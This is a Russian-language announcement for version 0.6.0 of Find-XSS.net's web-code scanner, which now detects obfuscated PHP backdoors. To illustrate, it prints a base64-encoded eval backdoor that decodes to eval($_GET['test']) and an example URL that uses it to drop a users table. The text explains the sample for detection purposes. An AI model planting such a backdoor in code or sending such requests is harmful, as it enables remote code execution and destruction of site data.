Уважаемые пользователи, представляем Вашему вниманию обновленную версию (0.6.0) XSS-сканера. Напомним, что разработанный нами сканер проверяет исходники, полученные от пользователя. Во время сканирования происходит анализ всех функций для определения степени их опасности, или безопасности. Полученные данные используются в дальнейшем анализе кода. В связи со всем вышесказанным в очередной раз обратим Ваше внимание на тот важный факт, что для проверки требуется загружать весь сайт (проект) целиком, а не его отдельные модули, поскольку в них используются функции, описанные в другом месте. В случае загрузки отдельных модулей отчет сканирования будет содержать ошибки.
Версия 0.6.0 способна анализировать скрытый код, создаваемый функцией base64_encode, и используемый в связке eval(base64_decode()). Давайте рассмотрим пример самого простого кода, который злоумышленник может оставить в шаблоне или в каком-нибудь модуле. Данный код выглядит следующим образом:
eval(base64_decode("JF9HRVRbJ3Rlc3QnXQ=="));
Использование этого, казалось бы, столь безобидного кода может открыть злоумышленнику полный доступ как к чужому сайту, так и к базе его данных. Почему? - спросите Вы. На самом деле все очень просто, хотя, возможно, не очень хорошо заметно обычному пользователю. Все дело заключается в функции base64_decode, которая производит раскодировку того, что было закодировано функцией base64_encode. Поэтому внешне безобидный код - eval(base64_decode("JF9HRVRbJ3Rlc3QnXQ==")) - в реальности превращается в - eval($_GET['test']), что в свою очередь приводит к передаче данных методом GET в параметре test (например так: http://site.ru/?test=mysql_query('DROP TABLE users')) и удалению таблицы users. Думаем, Вы согласитесь с тем фактом, что потребуется огромное количество времени на поиск уязвимости страшнее этой. Тем не менее, начиная с версии 0.6.0, XSS-сканер способен выявлять такой код, поэтому мы искренне рекомендуем Вам заново выполнить проверку Вашего сайта (пусть даже Вы и делали ее в прошлом). Еще одно приятное нововведение в версии 0.6.0 - нажав после завершения процесса сканирования своего проекта на кнопку "Помощь", пользователь сможет получить более качественные подсказки по исправлению тех или иных недочетов в коде. В случае возникновения каких-либо затруднений, связанных с удалением выявленного вредоносного кода или же исправлением недочетов в коде, обратитесь в службу поддержки Find-XSS.net, и мы с радостью поможем Вам за более чем скромное вознаграждение.
Доверьте свой проект XSS-сканеру, созданному усилиями разработчиков из Find-XSS.net, и Вы не оставите злоумышленнику ни единого шанса.
XSS и SQLi Сканер
Find Monitoring
HTML Валидатор
- Инструменты
XSS СканерXSS и SQL injection Сканер- HTML ВалидаторУпрощенный HTML Валидатор
- Утилиты
- Find-LinkПоиск скрытых внешних ссылок на сайте
- Find-PortПроверка открытых портов на сервере
- Find-InfoУдобная проверка прав на папки и файлы
- Find-DateДаты последних изменений файлов
- Find-StringПоиск заданного текста в файлах
- Find-ErrorПроверка кода на синтаксические ошибки
- Проверь себя
- XSS уязвимостиТест на XSS уязвимости
- SQLi уязвимостиТест на SQL injection
- ЛогикаТест на логические уязвимости
- Информеры
- Find-OnlineОнлайн пользователи на вашем сайте
- Find-Exchange-RateКурсы валют
- Find-IPКнопка IP пользователя
- Реклама
- РекламаСервис обмена рекламой
Статья
